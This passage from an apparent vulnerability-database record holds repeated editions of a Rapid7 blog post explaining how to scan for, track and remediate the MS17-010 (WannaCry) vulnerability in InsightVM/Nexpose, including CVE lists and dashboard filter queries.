First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" 
width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. 
</span></p></div><!-- [DocumentBodyEnd:2d29ad65-32b0-457f-8346-e45e3999e711] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-20T04:49:54"}, "differentElements": ["description"], "edition": 3}, {"lastseen": "2017-05-22T15:50:32", "bulletin": {"published": "2017-05-22T15:17:48", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 24, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:9aaf21e0-15e1-48d2-b2f5-fa04fcd9566f] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. 
Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span> OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a> </p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:9aaf21e0-15e1-48d2-b2f5-fa04fcd9566f] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-22T15:17:48", "lastseen": "2017-05-22T15:50:32"}, "differentElements": ["description"], "edition": 5}, {"lastseen": "2017-05-20T14:50:01", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, 